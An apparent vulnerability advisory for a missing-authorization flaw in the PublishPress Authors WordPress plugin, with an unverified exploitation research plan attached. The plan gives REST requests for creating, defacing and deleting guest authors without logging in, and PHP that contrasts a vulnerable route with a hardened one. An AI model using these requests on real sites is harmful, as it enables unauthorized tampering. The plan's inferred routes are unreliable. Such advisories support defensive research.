CVE-2026-25309

Co-Authors, Multiple Authors and Guest Authors in an Author Box with PublishPress Authors <= 4.10.1 - Missing Authorization

Severity: Medium (Missing Authorization)
CVSS Score: 5.3
Patched in: 4.11.0
Time to patch: 11 days

Description

The Co-Authors, Multiple Authors and Guest Authors in an Author Box with PublishPress Authors plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 4.10.1. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 4.10.1
Published: March 17, 2026
Last updated: March 27, 2026
Affected plugin: publishpress-authors

What Changed in the Fix

Changes introduced in v4.11.0

Source Code

WordPress.org SVN
Research Plan
Unverified

Exploitation Research Plan: CVE-2026-25309 (PublishPress Authors)

1. Vulnerability Summary

The PublishPress Authors plugin (<= 4.10.1) contains a missing authorization vulnerability in its REST API implementation. Specifically, the REST API endpoints introduced in version 4.8.0 to "create and update Authors and their fields" (identified in the changelog as feature #2065) do not implement sufficient capability checks. This allows unauthenticated attackers to create, modify, or delete author profiles (Guest Authors), which are stored as ppma_author custom post type objects. The advisory itself names only "a function"; the routes, handlers and field names below are inferred from the changelog and have not been confirmed against the plugin source.

2. Attack Vector Analysis

  • Endpoint: WordPress REST API.
  • Base Route: /wp-json/publishpress-authors/v1
  • Resource Route: /authors or /author
  • HTTP Methods: POST (Create), PUT / PATCH (Update), DELETE (Delete).
  • Vulnerable Parameter: The entire JSON body for creating/updating author profiles.
  • Authentication: None required (Unauthenticated).
  • Preconditions: The plugin must be active. Guest Author functionality is typically enabled by default.

3. Code Flow

  1. Registration: The plugin registers REST routes during the rest_api_init hook. Based on the 4.8.0 changelog, a controller class (likely within src/core/Classes/ or src/core/Rest/) registers routes for author management.
  2. Missing Check: Within the register_rest_route call for the authors endpoint, the permission_callback is either missing, set to __return_true, or fails to verify if the requester has the edit_posts or manage_options capability.
  3. Execution: The handler function (e.g., create_item or update_item) processes the input and uses wp_insert_post or internal plugin methods (like those in src/core/Classes/Author_Editor.php) to save the ppma_author data without verifying user permissions.
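The following is an added example, not code from PublishPress Authors, showing the bug class that section 3 describes: a REST route whose permission_callback admits anonymous requests, beside a hardened registration of the same route. The namespace, route, handler names, capability and meta key are illustrative assumptions; only the ppma_author post type comes from the page.

```php
<?php
/**
 * Added example, not code from PublishPress Authors: the bug class described
 * in section 3 (a REST route whose permission_callback admits anonymous
 * requests) beside a hardened registration. The namespace, route, handler
 * names, capability and meta key are illustrative assumptions; only the
 * ppma_author post type comes from the page.
 */

// Vulnerable registration. '__return_true' means every request, including one
// with no session at all, reaches the handler. Omitting permission_callback
// entirely has the same effect (WordPress 5.5+ only logs a _doing_it_wrong
// notice); it does not make the route private.
function example_register_author_route_vulnerable() {
	register_rest_route( 'example-authors/v1', '/authors', array(
		'methods'             => WP_REST_Server::CREATABLE, // POST
		'callback'            => 'example_create_author',
		'permission_callback' => '__return_true',
	) );
}

// Hardened registration: authorization lives in permission_callback, input
// rules live in 'args'. The two are independent; a strict schema does not
// substitute for a capability check.
function example_register_author_route_hardened() {
	register_rest_route( 'example-authors/v1', '/authors', array(
		'methods'             => WP_REST_Server::CREATABLE,
		'callback'            => 'example_create_author',
		'permission_callback' => 'example_can_manage_authors',
		'args'                => array(
			'title'       => array(
				'type'              => 'string',
				'required'          => true,
				'sanitize_callback' => 'sanitize_text_field',
			),
			'description' => array(
				'type'              => 'string',
				'sanitize_callback' => 'wp_kses_post',
			),
			'email'       => array(
				'type'              => 'string',
				'format'            => 'email',
				'sanitize_callback' => 'sanitize_email',
			),
		),
	) );
}
// Only the hardened variant is hooked; the vulnerable one is kept for comparison.
add_action( 'rest_api_init', 'example_register_author_route_hardened' );

/**
 * Permission callback: a capability check, not a nonce check. An anonymous
 * request has user ID 0, so current_user_can() is false and the REST server
 * answers rest_forbidden (401 for anonymous, 403 for a logged-in user without
 * the capability) before the handler runs. edit_others_posts is an assumed
 * policy; use whatever capability the site grants for managing authors.
 */
function example_can_manage_authors( WP_REST_Request $request ) {
	if ( current_user_can( 'edit_others_posts' ) ) {
		return true;
	}
	return new WP_Error(
		'rest_forbidden',
		__( 'Sorry, you are not allowed to manage author profiles.' ),
		array( 'status' => rest_authorization_required_code() )
	);
}

/**
 * Handler shared by both registrations: creates a ppma_author post. With the
 * vulnerable registration this runs for anyone who can reach /wp-json/.
 */
function example_create_author( WP_REST_Request $request ) {
	$post_id = wp_insert_post( array(
		'post_type'    => 'ppma_author',
		'post_status'  => 'publish',
		'post_title'   => $request['title'],
		'post_content' => (string) $request['description'],
	), true );

	if ( is_wp_error( $post_id ) ) {
		return $post_id; // reported as a 500 by the REST server
	}
	if ( ! empty( $request['email'] ) ) {
		update_post_meta( $post_id, 'example_author_email', $request['email'] ); // assumed key
	}
	return new WP_REST_Response( array( 'id' => $post_id ), 201 );
}
```

To exercise both paths, POST the JSON body from section 5 with curl: under the hardened registration an anonymous request returns 401 with code rest_forbidden, while the same request as an administrator (session cookie plus a valid X-WP-Nonce header, or an application password) returns 201. Swapping in the vulnerable registration makes the anonymous request return 201 as well, which is the behaviour the plan sets out to test for.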

4. Nonce Acquisition Strategy

Nonces do not stand in the way of an unauthenticated request. WordPress applies the wp_rest nonce check only to cookie-authenticated requests: a request that carries a logged-in session cookie but no X-WP-Nonce header (or _wpnonce parameter) is downgraded to anonymous, one with an invalid nonce is rejected with rest_cookie_invalid_nonce (403), and a request with no session cookie at all is simply anonymous and is never nonce-checked. Whether an anonymous request is processed is decided solely by the route's permission_callback, so a route registered with __return_true accepts it as-is.

If the endpoint turns out to require an authenticated session (and therefore a nonce), the following may locate one:

  1. Identify Exposure: The plugin may expose a REST nonce via wp_localize_script to support its block editor or author box features.
  2. Shortcode Strategy:
    • Create a page with the author list shortcode: [publishpress_authors_list]
    • wp post create --post_type=page --post_status=publish --post_title="Authors" --post_content='[publishpress_authors_list]'
  3. Extraction:
    • Navigate to the new page.
    • In the browser console, inspect the page's localized script objects for a REST nonce, e.g. window.ppAuthorsData?.rest_nonce or window.publishpressAuthorsConfig (both names are guesses), or search the page source for the string "nonce".

5. Exploitation Strategy

We will attempt to create a new Guest Author profile via the REST API.

Step 1: Discover the exact REST route

Perform a GET request to the REST index to confirm the available routes for the plugin.

  • Method: GET
  • URL: /wp-json/publishpress-authors/v1
  • Tool: curl or any HTTP client. The namespace index lists the registered routes with their allowed methods and argument schemas; it does not reveal whether a permission_callback is enforced, so each candidate route still has to be probed.

Step 2: Create a Guest Author

  • Method: POST
  • URL: /wp-json/publishpress-authors/v1/authors (or /author)
  • Headers:
    • Content-Type: application/json
  • Body (JSON):
{
    "title": "Injected Author",
    "description": "This author was created via CVE-2026-25309.",
    "email": "attacker@example.com",
    "slug": "hacked-author",
    "first_name": "Hacked",
    "last_name": "Author"
}

Step 3: Update an Existing Author (If creation fails)

If creation is restricted but update is not, attempt to overwrite an existing Guest Author (ID can be found by listing authors).

  • Method: POST or PUT
  • URL: /wp-json/publishpress-authors/v1/authors/<ID>
  • Body (JSON):
{
    "description": "Defaced bio"
}

6. Test Data Setup

  1. Ensure PublishPress Authors is installed and active on version 4.10.1.
  2. Create at least one post and assign it to a Guest Author via the WP Admin to ensure the ppma_author post type is initialized and a legitimate target exists.
  3. (Optional) Create a page with the [publishpress_authors_list] shortcode to facilitate nonce discovery if needed.

7. Expected Results

  • Success: The server returns a 201 Created or 200 OK response with a JSON object representing the newly created or modified author.
  • Not vulnerable (for this route): a 401 response with code rest_forbidden means the permission_callback rejected the anonymous request. A 400 argument-validation error (rest_missing_callback_param, rest_invalid_param) by itself does not settle the question; repeat the request with a body that satisfies the route's schema, and compare against an authenticated baseline (an administrator session with a valid X-WP-Nonce header, or an application password) that is expected to succeed.
  • Data Persistence: A new post of type ppma_author will exist in the database with the title "Injected Author".

8. Verification Steps

After the exploit, verify via WP-CLI:

# List all Guest Authors to see the injected one
wp post list --post_type=ppma_author

# Check the specific content of the injected author
wp post get $(wp post list --post_type=ppma_author --name=hacked-author --format=ids) --fields=post_title,post_content

9. Alternative Approaches

  • Metadata Manipulation: If the REST API allows updating meta fields, try to map the Guest Author to a real Administrator's user ID by updating the user-mapping meta field (the plan assumes the key mapped_user_id; confirm the actual key in the plugin source before relying on it).
  • AJAX Endpoint: If the REST API is protected, check for an admin-ajax.php action such as ppma_author_create_or_update (inferred name) registered via wp_ajax_nopriv_, which would be reachable without a session.
  • Author Deletion: Attempt a DELETE request to /wp-json/publishpress-authors/v1/authors/<ID> to verify whether unauthorized deletion is possible, which would destroy author-profile data.
